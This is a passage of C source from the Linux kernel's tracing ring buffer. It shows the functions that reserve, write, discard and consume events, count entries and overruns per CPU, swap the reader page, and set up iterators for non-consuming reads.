* and then that event will not be read later.
*
 * This function only works if it is called before the item has been
* committed. It will try to free the event from the ring buffer
* if another event has not been added behind it.
*
* If another event has been added behind it, it will set the event
* up as discarded, and perform the commit.
*
* If this function is called, do not call ring_buffer_unlock_commit on
* the event.
*/
void ring_buffer_discard_commit(struct ring_buffer *buffer,
struct ring_buffer_event *event)
{
struct ring_buffer_per_cpu *cpu_buffer;
int cpu;
/* The event is discarded regardless */
rb_event_discard(event);
cpu = smp_processor_id();
cpu_buffer = buffer->buffers[cpu];
/*
* This must only be called if the event has not been
* committed yet. Thus we can assume that preemption
* is still disabled.
*/
RB_WARN_ON(buffer, !local_read(&cpu_buffer->committing));
rb_decrement_entry(cpu_buffer, event);
if (rb_try_to_discard(cpu_buffer, event))
goto out;
/*
* The commit is still visible by the reader, so we
* must still update the timestamp.
*/
rb_update_write_stamp(cpu_buffer, event);
out:
rb_end_commit(cpu_buffer);
trace_recursive_unlock(cpu_buffer);
preempt_enable_notrace();
}
EXPORT_SYMBOL_GPL(ring_buffer_discard_commit);
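/*
 * Sketch of the discard path (illustrative; fill_entry() is a
 * hypothetical helper): reserve an event, and if it turns out not to
 * be wanted, discard it instead of committing.
 *
 *	event = ring_buffer_lock_reserve(buffer, sizeof(*entry));
 *	if (event) {
 *		entry = ring_buffer_event_data(event);
 *		if (fill_entry(entry))
 *			ring_buffer_unlock_commit(buffer, event);
 *		else
 *			ring_buffer_discard_commit(buffer, event);
 *	}
 */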
/**
* ring_buffer_write - write data to the buffer without reserving
* @buffer: The ring buffer to write to.
* @length: The length of the data being written (excluding the event header)
* @data: The data to write to the buffer.
*
* This is like ring_buffer_lock_reserve and ring_buffer_unlock_commit as
* one function. If you already have the data to write to the buffer, it
* may be easier to simply call this function.
*
* Note, like ring_buffer_lock_reserve, the length is the length of the data
* and not the length of the event which would hold the header.
*/
int ring_buffer_write(struct ring_buffer *buffer,
unsigned long length,
void *data)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
void *body;
int ret = -EBUSY;
int cpu;
preempt_disable_notrace();
if (atomic_read(&buffer->record_disabled))
goto out;
cpu = raw_smp_processor_id();
if (!cpumask_test_cpu(cpu, buffer->cpumask))
goto out;
cpu_buffer = buffer->buffers[cpu];
if (atomic_read(&cpu_buffer->record_disabled))
goto out;
if (length > BUF_MAX_DATA_SIZE)
goto out;
if (unlikely(trace_recursive_lock(cpu_buffer)))
goto out;
event = rb_reserve_next_event(buffer, cpu_buffer, length);
if (!event)
goto out_unlock;
body = rb_event_data(event);
memcpy(body, data, length);
rb_commit(cpu_buffer, event);
rb_wakeups(buffer, cpu_buffer);
ret = 0;
out_unlock:
trace_recursive_unlock(cpu_buffer);
out:
preempt_enable_notrace();
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_write);
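/*
 * Sketch (illustrative; "struct my_entry" is hypothetical): writing a
 * payload that is already prepared, in a single call instead of the
 * reserve/commit pair.
 *
 *	struct my_entry entry = { .value = 42 };
 *
 *	if (ring_buffer_write(buffer, sizeof(entry), &entry))
 *		return;		(-EBUSY: disabled, recursion, or no room)
 */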
static bool rb_per_cpu_empty(struct ring_buffer_per_cpu *cpu_buffer)
{
struct buffer_page *reader = cpu_buffer->reader_page;
struct buffer_page *head = rb_set_head_page(cpu_buffer);
struct buffer_page *commit = cpu_buffer->commit_page;
/* In case of error, head will be NULL */
if (unlikely(!head))
return true;
return reader->read == rb_page_commit(reader) &&
(commit == reader ||
(commit == head &&
head->read == rb_page_commit(commit)));
}
/**
* ring_buffer_record_disable - stop all writes into the buffer
* @buffer: The ring buffer to stop writes to.
*
* This prevents all writes to the buffer. Any attempt to write
* to the buffer after this will fail and return NULL.
*
* The caller should call synchronize_sched() after this.
*/
void ring_buffer_record_disable(struct ring_buffer *buffer)
{
atomic_inc(&buffer->record_disabled);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_disable);
/**
* ring_buffer_record_enable - enable writes to the buffer
* @buffer: The ring buffer to enable writes
*
* Note, multiple disables will need the same number of enables
* to truly enable the writing (much like preempt_disable).
*/
void ring_buffer_record_enable(struct ring_buffer *buffer)
{
atomic_dec(&buffer->record_disabled);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_enable);
/**
* ring_buffer_record_off - stop all writes into the buffer
* @buffer: The ring buffer to stop writes to.
*
* This prevents all writes to the buffer. Any attempt to write
* to the buffer after this will fail and return NULL.
*
* This is different than ring_buffer_record_disable() as
 * it works like an on/off switch, whereas the disable() version
 * must be paired with an enable().
*/
void ring_buffer_record_off(struct ring_buffer *buffer)
{
unsigned int rd;
unsigned int new_rd;
do {
rd = atomic_read(&buffer->record_disabled);
new_rd = rd | RB_BUFFER_OFF;
} while (atomic_cmpxchg(&buffer->record_disabled, rd, new_rd) != rd);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_off);
/**
* ring_buffer_record_on - restart writes into the buffer
* @buffer: The ring buffer to start writes to.
*
* This enables all writes to the buffer that was disabled by
* ring_buffer_record_off().
*
* This is different than ring_buffer_record_enable() as
 * it works like an on/off switch, whereas the enable() version
* must be paired with a disable().
*/
void ring_buffer_record_on(struct ring_buffer *buffer)
{
unsigned int rd;
unsigned int new_rd;
do {
rd = atomic_read(&buffer->record_disabled);
new_rd = rd & ~RB_BUFFER_OFF;
} while (atomic_cmpxchg(&buffer->record_disabled, rd, new_rd) != rd);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_on);
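/*
 * Sketch of the on/off switch semantics (illustrative): unlike the
 * counting disable()/enable() pair, off() and on() do not nest.
 *
 *	ring_buffer_record_off(buffer);
 *	ring_buffer_record_off(buffer);
 *	ring_buffer_record_on(buffer);
 *
 * After the single on() call the RB_BUFFER_OFF bit is clear again and
 * writes are accepted, no matter how many times off() was called.
 */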
/**
* ring_buffer_record_is_on - return true if the ring buffer can write
* @buffer: The ring buffer to see if write is enabled
*
* Returns true if the ring buffer is in a state that it accepts writes.
*/
int ring_buffer_record_is_on(struct ring_buffer *buffer)
{
return !atomic_read(&buffer->record_disabled);
}
/**
* ring_buffer_record_disable_cpu - stop all writes into the cpu_buffer
* @buffer: The ring buffer to stop writes to.
* @cpu: The CPU buffer to stop
*
* This prevents all writes to the buffer. Any attempt to write
* to the buffer after this will fail and return NULL.
*
* The caller should call synchronize_sched() after this.
*/
void ring_buffer_record_disable_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return;
cpu_buffer = buffer->buffers[cpu];
atomic_inc(&cpu_buffer->record_disabled);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_disable_cpu);
/**
* ring_buffer_record_enable_cpu - enable writes to the buffer
* @buffer: The ring buffer to enable writes
* @cpu: The CPU to enable.
*
* Note, multiple disables will need the same number of enables
* to truly enable the writing (much like preempt_disable).
*/
void ring_buffer_record_enable_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return;
cpu_buffer = buffer->buffers[cpu];
atomic_dec(&cpu_buffer->record_disabled);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_enable_cpu);
/*
* The total entries in the ring buffer is the running counter
* of entries entered into the ring buffer, minus the sum of
* the entries read from the ring buffer and the number of
* entries that were overwritten.
*/
static inline unsigned long
rb_num_of_entries(struct ring_buffer_per_cpu *cpu_buffer)
{
return local_read(&cpu_buffer->entries) -
(local_read(&cpu_buffer->overrun) + cpu_buffer->read);
}
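/*
 * For example (numbers are illustrative): if 100 events have been
 * written, 10 were overwritten and 30 have been read, then
 * rb_num_of_entries() reports 100 - (10 + 30) = 60 entries still
 * waiting in the buffer.
 */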
/**
* ring_buffer_oldest_event_ts - get the oldest event timestamp from the buffer
* @buffer: The ring buffer
* @cpu: The per CPU buffer to read from.
*/
u64 ring_buffer_oldest_event_ts(struct ring_buffer *buffer, int cpu)
{
unsigned long flags;
struct ring_buffer_per_cpu *cpu_buffer;
struct buffer_page *bpage;
u64 ret = 0;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
/*
 * If the tail is on the reader_page, the oldest time stamp is on the reader
* page
*/
if (cpu_buffer->tail_page == cpu_buffer->reader_page)
bpage = cpu_buffer->reader_page;
else
bpage = rb_set_head_page(cpu_buffer);
if (bpage)
ret = bpage->page->time_stamp;
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_oldest_event_ts);
/**
* ring_buffer_bytes_cpu - get the number of bytes consumed in a cpu buffer
* @buffer: The ring buffer
* @cpu: The per CPU buffer to read from.
*/
unsigned long ring_buffer_bytes_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long ret;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
ret = local_read(&cpu_buffer->entries_bytes) - cpu_buffer->read_bytes;
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_bytes_cpu);
/**
* ring_buffer_entries_cpu - get the number of entries in a cpu buffer
* @buffer: The ring buffer
* @cpu: The per CPU buffer to get the entries from.
*/
unsigned long ring_buffer_entries_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
return rb_num_of_entries(cpu_buffer);
}
EXPORT_SYMBOL_GPL(ring_buffer_entries_cpu);
/**
* ring_buffer_overrun_cpu - get the number of overruns caused by the ring
* buffer wrapping around (only if RB_FL_OVERWRITE is on).
* @buffer: The ring buffer
* @cpu: The per CPU buffer to get the number of overruns from
*/
unsigned long ring_buffer_overrun_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long ret;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
ret = local_read(&cpu_buffer->overrun);
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_overrun_cpu);
/**
* ring_buffer_commit_overrun_cpu - get the number of overruns caused by
* commits failing due to the buffer wrapping around while there are uncommitted
* events, such as during an interrupt storm.
* @buffer: The ring buffer
* @cpu: The per CPU buffer to get the number of overruns from
*/
unsigned long
ring_buffer_commit_overrun_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long ret;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
ret = local_read(&cpu_buffer->commit_overrun);
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_commit_overrun_cpu);
/**
* ring_buffer_dropped_events_cpu - get the number of dropped events caused by
* the ring buffer filling up (only if RB_FL_OVERWRITE is off).
* @buffer: The ring buffer
* @cpu: The per CPU buffer to get the number of overruns from
*/
unsigned long
ring_buffer_dropped_events_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long ret;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
ret = local_read(&cpu_buffer->dropped_events);
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_dropped_events_cpu);
/**
* ring_buffer_read_events_cpu - get the number of events successfully read
* @buffer: The ring buffer
* @cpu: The per CPU buffer to get the number of events read
*/
unsigned long
ring_buffer_read_events_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
return cpu_buffer->read;
}
EXPORT_SYMBOL_GPL(ring_buffer_read_events_cpu);
/**
* ring_buffer_entries - get the number of entries in a buffer
* @buffer: The ring buffer
*
* Returns the total number of entries in the ring buffer
* (all CPU entries)
*/
unsigned long ring_buffer_entries(struct ring_buffer *buffer)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long entries = 0;
int cpu;
/* if you care about this being correct, lock the buffer */
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
entries += rb_num_of_entries(cpu_buffer);
}
return entries;
}
EXPORT_SYMBOL_GPL(ring_buffer_entries);
/**
* ring_buffer_overruns - get the number of overruns in buffer
* @buffer: The ring buffer
*
* Returns the total number of overruns in the ring buffer
* (all CPU entries)
*/
unsigned long ring_buffer_overruns(struct ring_buffer *buffer)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long overruns = 0;
int cpu;
/* if you care about this being correct, lock the buffer */
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
overruns += local_read(&cpu_buffer->overrun);
}
return overruns;
}
EXPORT_SYMBOL_GPL(ring_buffer_overruns);
static void rb_iter_reset(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer = iter->cpu_buffer;
/* Iterator usage is expected to have record disabled */
iter->head_page = cpu_buffer->reader_page;
iter->head = cpu_buffer->reader_page->read;
iter->cache_reader_page = iter->head_page;
iter->cache_read = cpu_buffer->read;
if (iter->head)
iter->read_stamp = cpu_buffer->read_stamp;
else
iter->read_stamp = iter->head_page->page->time_stamp;
}
/**
* ring_buffer_iter_reset - reset an iterator
* @iter: The iterator to reset
*
* Resets the iterator, so that it will start from the beginning
* again.
*/
void ring_buffer_iter_reset(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long flags;
if (!iter)
return;
cpu_buffer = iter->cpu_buffer;
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
rb_iter_reset(iter);
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
}
EXPORT_SYMBOL_GPL(ring_buffer_iter_reset);
/**
* ring_buffer_iter_empty - check if an iterator has no more to read
* @iter: The iterator to check
*/
int ring_buffer_iter_empty(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer;
cpu_buffer = iter->cpu_buffer;
return iter->head_page == cpu_buffer->commit_page &&
iter->head == rb_commit_index(cpu_buffer);
}
EXPORT_SYMBOL_GPL(ring_buffer_iter_empty);
static void
rb_update_read_stamp(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
u64 delta;
switch (event->type_len) {
case RINGBUF_TYPE_PADDING:
return;
case RINGBUF_TYPE_TIME_EXTEND:
delta = event->array[0];
delta <<= TS_SHIFT;
delta += event->time_delta;
cpu_buffer->read_stamp += delta;
return;
case RINGBUF_TYPE_TIME_STAMP:
/* FIXME: not implemented */
return;
case RINGBUF_TYPE_DATA:
cpu_buffer->read_stamp += event->time_delta;
return;
default:
BUG();
}
return;
}
static void
rb_update_iter_read_stamp(struct ring_buffer_iter *iter,
struct ring_buffer_event *event)
{
u64 delta;
switch (event->type_len) {
case RINGBUF_TYPE_PADDING:
return;
case RINGBUF_TYPE_TIME_EXTEND:
delta = event->array[0];
delta <<= TS_SHIFT;
delta += event->time_delta;
iter->read_stamp += delta;
return;
case RINGBUF_TYPE_TIME_STAMP:
/* FIXME: not implemented */
return;
case RINGBUF_TYPE_DATA:
iter->read_stamp += event->time_delta;
return;
default:
BUG();
}
return;
}
static struct buffer_page *
rb_get_reader_page(struct ring_buffer_per_cpu *cpu_buffer)
{
struct buffer_page *reader = NULL;
unsigned long overwrite;
unsigned long flags;
int nr_loops = 0;
int ret;
local_irq_save(flags);
arch_spin_lock(&cpu_buffer->lock);
again:
/*
* This should normally only loop twice. But because the
* start of the reader inserts an empty page, it causes
* a case where we will loop three times. There should be no
* reason to loop four times (that I know of).
*/
if (RB_WARN_ON(cpu_buffer, ++nr_loops > 3)) {
reader = NULL;
goto out;
}
reader = cpu_buffer->reader_page;
/* If there's more to read, return this page */
if (cpu_buffer->reader_page->read < rb_page_size(reader))
goto out;
/* Never should we have an index greater than the size */
if (RB_WARN_ON(cpu_buffer,
cpu_buffer->reader_page->read > rb_page_size(reader)))
goto out;
/* check if we caught up to the tail */
reader = NULL;
if (cpu_buffer->commit_page == cpu_buffer->reader_page)
goto out;
/* Don't bother swapping if the ring buffer is empty */
if (rb_num_of_entries(cpu_buffer) == 0)
goto out;
/*
* Reset the reader page to size zero.
*/
local_set(&cpu_buffer->reader_page->write, 0);
local_set(&cpu_buffer->reader_page->entries, 0);
local_set(&cpu_buffer->reader_page->page->commit, 0);
cpu_buffer->reader_page->real_end = 0;
spin:
/*
* Splice the empty reader page into the list around the head.
*/
reader = rb_set_head_page(cpu_buffer);
if (!reader)
goto out;
cpu_buffer->reader_page->list.next = rb_list_head(reader->list.next);
cpu_buffer->reader_page->list.prev = reader->list.prev;
/*
* cpu_buffer->pages just needs to point to the buffer, it
 * has no specific buffer page to point to. Let's move it out
* of our way so we don't accidentally swap it.
*/
cpu_buffer->pages = reader->list.prev;
/* The reader page will be pointing to the new head */
rb_set_list_to_head(cpu_buffer, &cpu_buffer->reader_page->list);
/*
* We want to make sure we read the overruns after we set up our
* pointers to the next object. The writer side does a
* cmpxchg to cross pages which acts as the mb on the writer
* side. Note, the reader will constantly fail the swap
* while the writer is updating the pointers, so this
* guarantees that the overwrite recorded here is the one we
* want to compare with the last_overrun.
*/
smp_mb();
overwrite = local_read(&(cpu_buffer->overrun));
/*
* Here's the tricky part.
*
* We need to move the pointer past the header page.
* But we can only do that if a writer is not currently
* moving it. The page before the header page has the
 * flag bit '1' set if it is pointing to the page we want,
 * but if the writer is in the process of moving it
 * then it will be '2', or '0' if it has already been moved.
*/
ret = rb_head_page_replace(reader, cpu_buffer->reader_page);
/*
* If we did not convert it, then we must try again.
*/
if (!ret)
goto spin;
/*
* Yeah! We succeeded in replacing the page.
*
* Now make the new head point back to the reader page.
*/
rb_list_head(reader->list.next)->prev = &cpu_buffer->reader_page->list;
rb_inc_page(cpu_buffer, &cpu_buffer->head_page);
/* Finally update the reader page to the new head */
cpu_buffer->reader_page = reader;
cpu_buffer->reader_page->read = 0;
if (overwrite != cpu_buffer->last_overrun) {
cpu_buffer->lost_events = overwrite - cpu_buffer->last_overrun;
cpu_buffer->last_overrun = overwrite;
}
goto again;
out:
/* Update the read_stamp on the first event */
if (reader && reader->read == 0)
cpu_buffer->read_stamp = reader->page->time_stamp;
arch_spin_unlock(&cpu_buffer->lock);
local_irq_restore(flags);
return reader;
}
static void rb_advance_reader(struct ring_buffer_per_cpu *cpu_buffer)
{
struct ring_buffer_event *event;
struct buffer_page *reader;
unsigned length;
reader = rb_get_reader_page(cpu_buffer);
/* This function should not be called when buffer is empty */
if (RB_WARN_ON(cpu_buffer, !reader))
return;
event = rb_reader_event(cpu_buffer);
if (event->type_len <= RINGBUF_TYPE_DATA_TYPE_LEN_MAX)
cpu_buffer->read++;
rb_update_read_stamp(cpu_buffer, event);
length = rb_event_length(event);
cpu_buffer->reader_page->read += length;
}
static void rb_advance_iter(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
unsigned length;
cpu_buffer = iter->cpu_buffer;
/*
* Check if we are at the end of the buffer.
*/
if (iter->head >= rb_page_size(iter->head_page)) {
/* discarded commits can make the page empty */
if (iter->head_page == cpu_buffer->commit_page)
return;
rb_inc_iter(iter);
return;
}
event = rb_iter_head_event(iter);
length = rb_event_length(event);
/*
* This should not be called to advance the header if we are
* at the tail of the buffer.
*/
if (RB_WARN_ON(cpu_buffer,
(iter->head_page == cpu_buffer->commit_page) &&
(iter->head + length > rb_commit_index(cpu_buffer))))
return;
rb_update_iter_read_stamp(iter, event);
iter->head += length;
/* check for end of page padding */
if ((iter->head >= rb_page_size(iter->head_page)) &&
(iter->head_page != cpu_buffer->commit_page))
rb_inc_iter(iter);
}
static int rb_lost_events(struct ring_buffer_per_cpu *cpu_buffer)
{
return cpu_buffer->lost_events;
}
static struct ring_buffer_event *
rb_buffer_peek(struct ring_buffer_per_cpu *cpu_buffer, u64 *ts,
unsigned long *lost_events)
{
struct ring_buffer_event *event;
struct buffer_page *reader;
int nr_loops = 0;
again:
/*
* We repeat when a time extend is encountered.
* Since the time extend is always attached to a data event,
* we should never loop more than once.
* (We never hit the following condition more than twice).
*/
if (RB_WARN_ON(cpu_buffer, ++nr_loops > 2))
return NULL;
reader = rb_get_reader_page(cpu_buffer);
if (!reader)
return NULL;
event = rb_reader_event(cpu_buffer);
switch (event->type_len) {
case RINGBUF_TYPE_PADDING:
if (rb_null_event(event))
RB_WARN_ON(cpu_buffer, 1);
/*
* Because the writer could be discarding every
* event it creates (which would probably be bad)
* if we were to go back to "again" then we may never
* catch up, and will trigger the warn on, or lock
* the box. Return the padding, and we will release
* the current locks, and try again.
*/
return event;
case RINGBUF_TYPE_TIME_EXTEND:
/* Internal data, OK to advance */
rb_advance_reader(cpu_buffer);
goto again;
case RINGBUF_TYPE_TIME_STAMP:
/* FIXME: not implemented */
rb_advance_reader(cpu_buffer);
goto again;
case RINGBUF_TYPE_DATA:
if (ts) {
*ts = cpu_buffer->read_stamp + event->time_delta;
ring_buffer_normalize_time_stamp(cpu_buffer->buffer,
cpu_buffer->cpu, ts);
}
if (lost_events)
*lost_events = rb_lost_events(cpu_buffer);
return event;
default:
BUG();
}
return NULL;
}
EXPORT_SYMBOL_GPL(ring_buffer_peek);
static struct ring_buffer_event *
rb_iter_peek(struct ring_buffer_iter *iter, u64 *ts)
{
struct ring_buffer *buffer;
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
int nr_loops = 0;
cpu_buffer = iter->cpu_buffer;
buffer = cpu_buffer->buffer;
/*
* Check if someone performed a consuming read to
* the buffer. A consuming read invalidates the iterator
* and we need to reset the iterator in this case.
*/
if (unlikely(iter->cache_read != cpu_buffer->read ||
iter->cache_reader_page != cpu_buffer->reader_page))
rb_iter_reset(iter);
again:
if (ring_buffer_iter_empty(iter))
return NULL;
/*
* We repeat when a time extend is encountered or we hit
* the end of the page. Since the time extend is always attached
* to a data event, we should never loop more than three times.
* Once for going to next page, once on time extend, and
* finally once to get the event.
* (We never hit the following condition more than thrice).
*/
if (RB_WARN_ON(cpu_buffer, ++nr_loops > 3))
return NULL;
if (rb_per_cpu_empty(cpu_buffer))
return NULL;
if (iter->head >= rb_page_size(iter->head_page)) {
rb_inc_iter(iter);
goto again;
}
event = rb_iter_head_event(iter);
switch (event->type_len) {
case RINGBUF_TYPE_PADDING:
if (rb_null_event(event)) {
rb_inc_iter(iter);
goto again;
}
rb_advance_iter(iter);
return event;
case RINGBUF_TYPE_TIME_EXTEND:
/* Internal data, OK to advance */
rb_advance_iter(iter);
goto again;
case RINGBUF_TYPE_TIME_STAMP:
/* FIXME: not implemented */
rb_advance_iter(iter);
goto again;
case RINGBUF_TYPE_DATA:
if (ts) {
*ts = iter->read_stamp + event->time_delta;
ring_buffer_normalize_time_stamp(buffer,
cpu_buffer->cpu, ts);
}
return event;
default:
BUG();
}
return NULL;
}
EXPORT_SYMBOL_GPL(ring_buffer_iter_peek);
static inline bool rb_reader_lock(struct ring_buffer_per_cpu *cpu_buffer)
{
if (likely(!in_nmi())) {
raw_spin_lock(&cpu_buffer->reader_lock);
return true;
}
/*
 * If an NMI die dumps out the content of the ring buffer,
* trylock must be used to prevent a deadlock if the NMI
* preempted a task that holds the ring buffer locks. If
* we get the lock then all is fine, if not, then continue
* to do the read, but this can corrupt the ring buffer,
* so it must be permanently disabled from future writes.
* Reading from NMI is a oneshot deal.
*/
if (raw_spin_trylock(&cpu_buffer->reader_lock))
return true;
/* Continue without locking, but disable the ring buffer */
atomic_inc(&cpu_buffer->record_disabled);
return false;
}
static inline void
rb_reader_unlock(struct ring_buffer_per_cpu *cpu_buffer, bool locked)
{
if (likely(locked))
raw_spin_unlock(&cpu_buffer->reader_lock);
return;
}
/**
* ring_buffer_peek - peek at the next event to be read
* @buffer: The ring buffer to read
 * @cpu: The cpu to peek at
* @ts: The timestamp counter of this event.
* @lost_events: a variable to store if events were lost (may be NULL)
*
* This will return the event that will be read next, but does
* not consume the data.
*/
struct ring_buffer_event *
ring_buffer_peek(struct ring_buffer *buffer, int cpu, u64 *ts,
unsigned long *lost_events)
{
struct ring_buffer_per_cpu *cpu_buffer = buffer->buffers[cpu];
struct ring_buffer_event *event;
unsigned long flags;
bool dolock;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return NULL;
again:
local_irq_save(flags);
dolock = rb_reader_lock(cpu_buffer);
event = rb_buffer_peek(cpu_buffer, ts, lost_events);
if (event && event->type_len == RINGBUF_TYPE_PADDING)
rb_advance_reader(cpu_buffer);
rb_reader_unlock(cpu_buffer, dolock);
local_irq_restore(flags);
if (event && event->type_len == RINGBUF_TYPE_PADDING)
goto again;
return event;
}
/**
* ring_buffer_iter_peek - peek at the next event to be read
* @iter: The ring buffer iterator
* @ts: The timestamp counter of this event.
*
* This will return the event that will be read next, but does
* not increment the iterator.
*/
struct ring_buffer_event *
ring_buffer_iter_peek(struct ring_buffer_iter *iter, u64 *ts)
{
struct ring_buffer_per_cpu *cpu_buffer = iter->cpu_buffer;
struct ring_buffer_event *event;
unsigned long flags;
again:
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
event = rb_iter_peek(iter, ts);
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
if (event && event->type_len == RINGBUF_TYPE_PADDING)
goto again;
return event;
}
/**
* ring_buffer_consume - return an event and consume it
* @buffer: The ring buffer to get the next event from
* @cpu: the cpu to read the buffer from
* @ts: a variable to store the timestamp (may be NULL)
* @lost_events: a variable to store if events were lost (may be NULL)
*
* Returns the next event in the ring buffer, and that event is consumed.
* Meaning, that sequential reads will keep returning a different event,
* and eventually empty the ring buffer if the producer is slower.
*/
struct ring_buffer_event *
ring_buffer_consume(struct ring_buffer *buffer, int cpu, u64 *ts,
unsigned long *lost_events)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event = NULL;
unsigned long flags;
bool dolock;
again:
/* might be called in atomic */
preempt_disable();
if (!cpumask_test_cpu(cpu, buffer->cpumask))
goto out;
cpu_buffer = buffer->buffers[cpu];
local_irq_save(flags);
dolock = rb_reader_lock(cpu_buffer);
event = rb_buffer_peek(cpu_buffer, ts, lost_events);
if (event) {
cpu_buffer->lost_events = 0;
rb_advance_reader(cpu_buffer);
}
rb_reader_unlock(cpu_buffer, dolock);
local_irq_restore(flags);
out:
preempt_enable();
if (event && event->type_len == RINGBUF_TYPE_PADDING)
goto again;
return event;
}
EXPORT_SYMBOL_GPL(ring_buffer_consume);
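/*
 * Sketch of a consuming read loop for one CPU (illustrative;
 * process_event() is a hypothetical consumer):
 *
 *	struct ring_buffer_event *event;
 *	unsigned long lost;
 *	u64 ts;
 *
 *	while ((event = ring_buffer_consume(buffer, cpu, &ts, &lost)))
 *		process_event(ring_buffer_event_data(event), ts, lost);
 */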
/**
* ring_buffer_read_prepare - Prepare for a non consuming read of the buffer
* @buffer: The ring buffer to read from
* @cpu: The cpu buffer to iterate over
*
* This performs the initial preparations necessary to iterate
* through the buffer. Memory is allocated, buffer recording
* is disabled, and the iterator pointer is returned to the caller.
*
 * Disabling buffer recording prevents the reading from being
* corrupted. This is not a consuming read, so a producer is not
* expected.
*
* After a sequence of ring_buffer_read_prepare calls, the user is
* expected to make at least one call to ring_buffer_read_prepare_sync.
* Afterwards, ring_buffer_read_start is invoked to get things going
* for real.
*
* This overall must be paired with ring_buffer_read_finish.
*/
struct ring_buffer_iter *
ring_buffer_read_prepare(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_iter *iter;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return NULL;
iter = kmalloc(sizeof(*iter), GFP_KERNEL);
if (!iter)
return NULL;
cpu_buffer = buffer->buffers[cpu];
iter->cpu_buffer = cpu_buffer;
atomic_inc(&buffer->resize_disabled);
atomic_inc(&cpu_buffer->record_disabled);
return iter;
}
EXPORT_SYMBOL_GPL(ring_buffer_read_prepare);
/**
* ring_buffer_read_prepare_sync - Synchronize a set of prepare calls
*
* All previously invoked ring_buffer_read_prepare calls to prepare
 * iterators will be synchronized. Afterwards, ring_buffer_read_start
* calls on those iterators are allowed.
*/
void
ring_buffer_read_prepare_sync(void)
{
synchronize_sched();
}
EXPORT_SYMBOL_GPL(ring_buffer_read_prepare_sync);
/**
* ring_buffer_read_start - start a non consuming read of the buffer
* @iter: The iterator returned by ring_buffer_read_prepare
*
* This finalizes the startup of an iteration through the buffer.
* The iterator comes from a call to ring_buffer_read_prepare and
* an intervening ring_buffer_read_prepare_sync must have been
* performed.
*
* Must be paired with ring_buffer_read_finish.
*/
void
ring_buffer_read_start(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long flags;
if (!iter)
return;
cpu_buffer = iter->cpu_buffer;
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
arch_spin_lock(&cpu_buffer->lock);
rb_iter_reset(iter);
arch_spin_unlock(&cpu_buffer->lock);
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
}
EXPORT_SYMBOL_GPL(ring_buffer_read_start);
/**
* ring_buffer_read_finish - finish reading the iterator of the buffer
 * @iter: The iterator retrieved by ring_buffer_read_prepare
*
* This re-enables the recording to the buffer, and frees the
* iterator.
*/
void
ring_buffer_read_finish(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer = iter->cpu_buffer;
unsigned long flags;
/*
* Ring buffer is disabled from recording, here's a good place
